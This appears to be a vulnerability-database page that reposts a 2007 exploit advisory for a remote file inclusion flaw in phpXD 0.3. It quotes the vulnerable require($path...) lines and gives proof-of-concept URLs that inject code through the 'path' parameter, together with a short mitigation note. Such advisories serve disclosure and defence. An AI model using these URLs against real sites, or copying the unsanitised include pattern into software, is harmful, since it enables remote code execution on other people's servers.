header-logo
Suggest Exploit
vendor:
by:
Dr Max Virus
7.5
CVSS
HIGH
Bug in (include/)
98
CWE
Product Name:
Affected Version From: 0.3
Affected Version To: 0.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Script:phpxd

The vulnerability exists in the include/ directory of the phpXD script. It is caused by the insecure usage of the require() function to include PHP files. An attacker can exploit this vulnerability by providing a malicious code in the 'path' parameter of the affected PHP files, which can lead to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in PHP scripts. Additionally, it is advised to keep the script up-to-date with the latest patches and security updates.
Source

Exploit-DB raw data:

               _________________________________
      ________|                                 |________
      \       |              Dr Max Virus       |       /
       \      |                                 |      /
       /      |_________________________________|      \
      /___________)                         (___________\
------------------------------------------------------------------------------------------------------------------------
Script:phpxd
Affected Version:0.3
Downlaoad:http://websec.science.uva.nl/~kaper/xml_archief/phpXD/phpxd_0.3.tar.gz
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (include/)
Vul Code;
require($path."include/dom/Node.php");
require($path."include/dom/Attr.php");
require($path."include/dom/CharacterData.php");
require($path."include/dom/Comment.php");
require($path."include/dom/Document.php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/include/dom.php?path=[Bad Code]
http://[target]/[path]/include/dtd.php?path=[Bad Code]
http://[target]/[path]/include/parser.php?path=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-23]